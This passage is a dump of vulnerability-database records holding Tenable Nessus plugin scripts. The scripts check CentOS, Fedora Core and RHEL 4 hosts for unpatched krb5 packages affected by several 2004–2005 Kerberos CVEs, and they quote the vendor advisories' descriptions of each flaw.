was found in the krb5_recvauth() routine which may\nbe triggered by a remote unauthenticated attacker. Red Hat Enterprise\nLinux 4 contains checks within glibc that detect double-free flaws.\nTherefore, on Red Hat Enterprise Linux 4 successful exploitation of\nthis issue can only lead to a denial of service (KDC crash). The\nCommon Vulnerabilities and Exposures project assigned the name\nCVE-2005-1689 to this issue.\n\nDaniel Wachdorf discovered a single byte heap overflow in the\nkrb5_unparse_name() function, part of krb5-libs. Sucessful\nexploitation of this flaw would lead to a denial of service (crash).\nTo trigger this flaw an attacker would need to have control of a\nkerberos realm that shares a cross-realm key with the target, making\nexploitation of this flaw unlikely. (CVE-2005-1175).\n\nDaniel Wachdorf also discovered that in error conditions that may\noccur in response to correctly-formatted client requests, the Kerberos\n5 KDC may attempt to free uninitialized memory. This could allow a\nremote attacker to cause a denial of service (KDC crash)\n(CVE-2005-1174).\n\nGael Delalleau discovered an information disclosure issue in the way\nsome telnet clients handle messages from a server. An attacker could\nconstruct a malicious telnet server that collects information from the\nenvironment of any victim who connects to it using the Kerberos-aware\ntelnet client (CVE-2005-0488).\n\nThe rcp protocol allows a server to instruct a client to write to\narbitrary files outside of the current directory. This could\npotentially cause a security issue if a user uses the Kerberos-aware\nrcp to copy files from a malicious server (CVE-2004-0175).\n\nAll users of krb5 should update to these erratum packages, which\ncontain backported patches to correct these issues. Red Hat would like\nto thank the MIT Kerberos Development Team for their responsible\ndisclosure of these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-July/011927.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c2337201\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-July/011928.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1bf2ad67\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-July/011929.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4396db81\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected krb5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(22, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", reference:\"krb5-devel-1.3.4-17\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"krb5-libs-1.3.4-17\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"krb5-server-1.3.4-17\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"krb5-workstation-1.3.4-17\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-devel / krb5-libs / krb5-server / krb5-workstation\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-04T01:39:56", "description": "A double-free flaw was found in the krb5_recvauth() routine which may\nbe triggered by a remote unauthenticated attacker. Fedora Core 3\ncontains checks within glibc that detect double-free flaws. Therefore,\non Fedora Core 3, successful exploitation of this issue can only lead\nto a denial of service (KDC crash). The Common Vulnerabilities and\nExposures project assigned the name CVE-2005-1689 to this issue.\n\nDaniel Wachdorf discovered a single byte heap overflow in the\nkrb5_unparse_name() function, part of krb5-libs. Successful\nexploitation of this flaw would lead to a denial of service (crash).\nTo trigger this flaw remotely, an attacker would need to have control\nof a kerberos realm that shares a cross-realm key with the target,\nmaking exploitation of this flaw unlikely. (CVE-2005-1175).\n\nDaniel Wachdorf also discovered that in error conditions that may\noccur in response to correctly-formatted client requests, the Kerberos\n5 KDC may attempt to free uninitialized memory. This could allow a\nremote attacker to cause a denial of service (KDC crash)\n(CVE-2005-1174).\n\nGaael Delalleau discovered an information disclosure issue in the way\nsome telnet clients handle messages from a server. An attacker could\nconstruct a malicious telnet server that collects information from the\nenvironment of any victim who connects to it using the Kerberos-aware\ntelnet client (CVE-2005-0488).\n\nThe rcp protocol allows a server to instruct a client to write to\narbitrary files outside of the current directory. This could\npotentially cause a security issue if a user uses the Kerberos-aware\nrcp to copy files from a malicious server (CVE-2004-0175).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "published": "2005-07-13T00:00:00", "title": "Fedora Core 3 : krb5-1.3.6-7 (2005-552)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-0488", "CVE-2005-1175", "CVE-2004-0175"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora_core:3", "p-cpe:/a:fedoraproject:fedora:krb5-debuginfo", "p-cpe:/a:fedoraproject:fedora:krb5-server", "p-cpe:/a:fedoraproject:fedora:krb5-workstation", "p-cpe:/a:fedoraproject:fedora:krb5-libs", "p-cpe:/a:fedoraproject:fedora:krb5-devel"], "id": "FEDORA_2005-552.NASL", "href": "https://www.tenable.com/plugins/nessus/18684", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-552.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18684);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2019/08/02 13:32:24\");\n\n script_cve_id(\"CVE-2005-1689\");\n script_xref(name:\"FEDORA\", value:\"2005-552\");\n\n script_name(english:\"Fedora Core 3 : krb5-1.3.6-7 (2005-552)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A double-free flaw was found in the krb5_recvauth() routine which may\nbe triggered by a remote unauthenticated attacker. Fedora Core 3\ncontains checks within glibc that detect double-free flaws. Therefore,\non Fedora Core 3, successful exploitation of this issue can only lead\nto a denial of service (KDC crash). The Common Vulnerabilities and\nExposures project assigned the name CVE-2005-1689 to this issue.\n\nDaniel Wachdorf discovered a single byte heap overflow in the\nkrb5_unparse_name() function, part of krb5-libs. Successful\nexploitation of this flaw would lead to a denial of service (crash).\nTo trigger this flaw remotely, an attacker would need to have control\nof a kerberos realm that shares a cross-realm key with the target,\nmaking exploitation of this flaw unlikely. (CVE-2005-1175).\n\nDaniel Wachdorf also discovered that in error conditions that may\noccur in response to correctly-formatted client requests, the Kerberos\n5 KDC may attempt to free uninitialized memory. This could allow a\nremote attacker to cause a denial of service (KDC crash)\n(CVE-2005-1174).\n\nGaael Delalleau discovered an information disclosure issue in the way\nsome telnet clients handle messages from a server. An attacker could\nconstruct a malicious telnet server that collects information from the\nenvironment of any victim who connects to it using the Kerberos-aware\ntelnet client (CVE-2005-0488).\n\nThe rcp protocol allows a server to instruct a client to write to\narbitrary files outside of the current directory. This could\npotentially cause a security issue if a user uses the Kerberos-aware\nrcp to copy files from a malicious server (CVE-2004-0175).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-July/001063.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c221f1de\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 3.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC3\", reference:\"krb5-debuginfo-1.3.6-7\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"krb5-devel-1.3.6-7\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"krb5-libs-1.3.6-7\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"krb5-server-1.3.6-7\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"krb5-workstation-1.3.6-7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-debuginfo / krb5-devel / krb5-libs / krb5-server / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-04T01:39:56", "description": "A double-free flaw was found in the krb5_recvauth() routine which may\nbe triggered by a remote unauthenticated attacker. Fedora Core 4\ncontains checks within glibc that detect double-free flaws. Therefore,\non Fedora Core 4, successful exploitation of this issue can only lead\nto a denial of service (KDC crash). The Common Vulnerabilities and\nExposures project assigned the name CVE-2005-1689 to this issue.\n\nDaniel Wachdorf discovered a single byte heap overflow in the\nkrb5_unparse_name() function, part of krb5-libs. Successful\nexploitation of this flaw would lead to a denial of service (crash).\nTo trigger this flaw remotely, an attacker would need to have control\nof a kerberos realm that shares a cross-realm key with the target,\nmaking exploitation of this flaw unlikely. (CVE-2005-1175).\n\nDaniel Wachdorf also discovered that in error conditions that may\noccur in response to correctly-formatted client requests, the Kerberos\n5 KDC may attempt to free uninitialized memory. This could allow a\nremote attacker to cause a denial of service (KDC crash)\n(CVE-2005-1174).\n\nGaael Delalleau discovered an information disclosure issue in the way\nsome telnet clients handle messages from a server. An attacker could\nconstruct a malicious telnet server that collects information from the\nenvironment of any victim who connects to it using the Kerberos-aware\ntelnet client (CVE-2005-0488).\n\nThe rcp protocol allows a server to instruct a client to write to\narbitrary files outside of the current directory. This could\npotentially cause a security issue if a user uses the Kerberos-aware\nrcp to copy files from a malicious server (CVE-2004-0175).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "published": "2005-07-13T00:00:00", "title": "Fedora Core 4 : krb5-1.4.1-5 (2005-553)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-0488", "CVE-2005-1175", "CVE-2004-0175"], "modified": "2020-09-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:krb5-debuginfo", "p-cpe:/a:fedoraproject:fedora:krb5-server", "p-cpe:/a:fedoraproject:fedora:krb5-workstation", "cpe:/o:fedoraproject:fedora_core:4", "p-cpe:/a:fedoraproject:fedora:krb5-libs", "p-cpe:/a:fedoraproject:fedora:krb5-devel"], "id": "FEDORA_2005-553.NASL", "href": "https://www.tenable.com/plugins/nessus/18685", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-553.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18685);\n script_version (\"1.18\");\n script_cvs_date(\"Date: 2019/08/02 13:32:24\");\n\n script_cve_id(\"CVE-2005-1689\");\n script_xref(name:\"FEDORA\", value:\"2005-553\");\n\n script_name(english:\"Fedora Core 4 : krb5-1.4.1-5 (2005-553)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A double-free flaw was found in the krb5_recvauth() routine which may\nbe triggered by a remote unauthenticated attacker. Fedora Core 4\ncontains checks within glibc that detect double-free flaws. Therefore,\non Fedora Core 4, successful exploitation of this issue can only lead\nto a denial of service (KDC crash). The Common Vulnerabilities and\nExposures project assigned the name CVE-2005-1689 to this issue.\n\nDaniel Wachdorf discovered a single byte heap overflow in the\nkrb5_unparse_name() function, part of krb5-libs. Successful\nexploitation of this flaw would lead to a denial of service (crash).\nTo trigger this flaw remotely, an attacker would need to have control\nof a kerberos realm that shares a cross-realm key with the target,\nmaking exploitation of this flaw unlikely. (CVE-2005-1175).\n\nDaniel Wachdorf also discovered that in error conditions that may\noccur in response to correctly-formatted client requests, the Kerberos\n5 KDC may attempt to free uninitialized memory. This could allow a\nremote attacker to cause a denial of service (KDC crash)\n(CVE-2005-1174).\n\nGaael Delalleau discovered an information disclosure issue in the way\nsome telnet clients handle messages from a server. An attacker could\nconstruct a malicious telnet server that collects information from the\nenvironment of any victim who connects to it using the Kerberos-aware\ntelnet client (CVE-2005-0488).\n\nThe rcp protocol allows a server to instruct a client to write to\narbitrary files outside of the current directory. This could\npotentially cause a security issue if a user uses the Kerberos-aware\nrcp to copy files from a malicious server (CVE-2004-0175).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-July/001064.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?04b2cbe5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 4.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC4\", reference:\"krb5-debuginfo-1.4.1-5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"krb5-devel-1.4.1-5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"krb5-libs-1.4.1-5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"krb5-server-1.4.1-5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"krb5-workstation-1.4.1-5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-debuginfo / krb5-devel / krb5-libs / krb5-server / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-04T04:53:41", "description": "Updated krb5 packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nKerberos is a networked authentication system that uses a trusted\nthird party (a KDC) to authenticate clients and servers to each other.\n\nA double-free flaw was found in the krb5_recvauth() routine which may\nbe triggered by a remote unauthenticated attacker. Red Hat Enterprise\nLinux 4 contains checks within glibc that detect double-free flaws.\nTherefore, on Red Hat Enterprise Linux 4 successful exploitation of\nthis issue can only lead to a denial of service (KDC crash). The\nCommon Vulnerabilities and Exposures project assigned the name\nCVE-2005-1689 to this issue.\n\nDaniel Wachdorf discovered a single byte heap overflow in the\nkrb5_unparse_name() function, part of krb5-libs. Sucessful\nexploitation of this flaw would lead to a denial of service (crash).\nTo trigger this flaw an attacker would need to have control of a\nkerberos realm that shares a cross-realm key with the target, making\nexploitation of this flaw unlikely. (CVE-2005-1175).\n\nDaniel Wachdorf also discovered that in error conditions that may\noccur in response to correctly-formatted client requests, the Kerberos\n5 KDC may attempt to free uninitialized memory. This could allow a\nremote attacker to cause a denial of service (KDC crash)\n(CVE-2005-1174).\n\nGael Delalleau discovered an information disclosure issue in the way\nsome telnet clients handle messages from a server. An attacker could\nconstruct a malicious telnet server that collects information from the\nenvironment of any victim who connects to it using the Kerberos-aware\ntelnet client (CVE-2005-0488).\n\nThe rcp protocol allows a server to instruct a client to write to\narbitrary files outside of the current directory. This could\npotentially cause a security issue if a user uses the Kerberos-aware\nrcp to copy files from a malicious server (CVE-2004-0175).\n\nAll users of krb5 should update to these erratum packages, which\ncontain backported patches to correct these issues. Red Hat would like\nto thank the MIT Kerberos Development Team for their responsible\ndisclosure of these issues.", "edition": 22, "published": "2005-07-13T00:00:00", "title": "RHEL 4 : krb5 (RHSA-2005:567)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-0488", "CVE-2005-1175", "CVE-2004-0175"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:krb5-libs", "p-cpe:/a:redhat:enterprise_linux:krb5-devel", "p-cpe:/a:redhat:enterprise_linux:krb5-workstation", "p-cpe:/a:redhat:enterprise_linux:krb5-server"], "id": "REDHAT-RHSA-2005-567.NASL", "href": "https://www.tenable.com/plugins/nessus/18688", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:567. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18688);\n script_version (\"1.28\");\n script_cvs_date(\"Date: 2019/10/25 13:36:11\");\n\n script_cve_id(\"CVE-2004-0175\", \"CVE-2005-1174\", \"CVE-2005-1175\", \"CVE-2005-1689\");\n script_xref(name:\"RHSA\", value:\"2005:567\");\n\n script_name(english:\"RHEL 4 : krb5 (RHSA-2005:567)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated krb5 packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nKerberos is a networked authentication system that uses a trusted\nthird party (a KDC) to authenticate clients and servers to each other.\n\nA double-free flaw was found in the krb5_recvauth() routine which may\nbe triggered by a remote unauthenticated attacker. Red Hat Enterprise\nLinux 4 contains checks within glibc that detect double-free flaws.\nTherefore, on Red Hat Enterprise Linux 4 successful exploitation of\nthis issue can only lead to a denial of service (KDC crash). The\nCommon Vulnerabilities and Exposures project assigned the name\nCVE-2005-1689 to this issue.\n\nDaniel Wachdorf discovered a single byte heap overflow in the\nkrb5_unparse_name() function, part of krb5-libs. Sucessful\nexploitation of this flaw would lead to a denial of service (crash).\nTo trigger this flaw an attacker would need to have control of a\nkerberos realm that shares a cross-realm key with the target, making\nexploitation of this flaw unlikely. (CVE-2005-1175).\n\nDaniel Wachdorf also discovered that in error conditions that may\noccur in response to correctly-formatted client requests, the Kerberos\n5 KDC may attempt to free uninitialized memory. This could allow a\nremote attacker to cause a denial of service (KDC crash)\n(CVE-2005-1174).\n\nGael Delalleau discovered an information disclosure issue in the way\nsome telnet clients handle messages from a server. An attacker could\nconstruct a malicious telnet server that collects information from the\nenvironment of any victim who connects to it using the Kerberos-aware\ntelnet client (CVE-2005-0488).\n\nThe rcp protocol allows a server to instruct a client to write to\narbitrary files outside of the current directory. This could\npotentially cause a security issue if a user uses the Kerberos-aware\nrcp to copy files from a malicious server (CVE-2004-0175).\n\nAll users of krb5 should update to these erratum packages, which\ncontain backported patches to correct these issues. Red Hat would like\nto thank the MIT Kerberos Development Team for their responsible\ndisclosure of these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-1174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-1175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-1689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2005:567\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(22, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) 